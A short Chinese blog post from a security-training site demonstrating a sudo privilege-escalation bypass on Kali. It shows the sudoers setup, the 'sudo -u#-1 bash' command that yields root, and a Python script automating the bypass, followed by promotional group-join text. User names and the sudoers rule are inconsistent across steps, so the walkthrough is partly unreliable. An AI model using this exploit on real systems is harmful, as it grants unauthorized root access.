我的这台kali 内核是5.2.0-kali2-amd64的。
Sudo的版本:
那现在我加入一个用户叫sudo_test。
在查看一下passwd里的sudo_test信息!
然后再/etc/sudoers种增加一个 test_sudo ALL=(ALL,!root) /usr/bin/id
这个表示不允许test_sudo账户获取root的权限来执行/bin/bash这个命令!!!
现在切换成sudot_test这个用户!!
现在执行sudo –u#-1 bash
执行完,你看看你的普通账户变成了root账户,uid变成了root,其他的还是sudo_test的!!!
我换个普通账户看看执行bash命令会怎么样!!
执行完bash,就没有变化!id依然没变!!!
这个是python的代码,用来测试的!!
#!/usr/bin/python3
import os
#Get current username
username = input("Enter current username :")
#check which binary the user can run with sudo
os.system("sudo -l > priv")
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
binary_file = open("binary")
binary= binary_file.read()
#execute sudo exploit
print("Lets hope it works")
os.system("sudo -u#-1 "+ binary)
最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群。(送免费资料和优惠券)
就会自动分享给你群号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。
还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券!!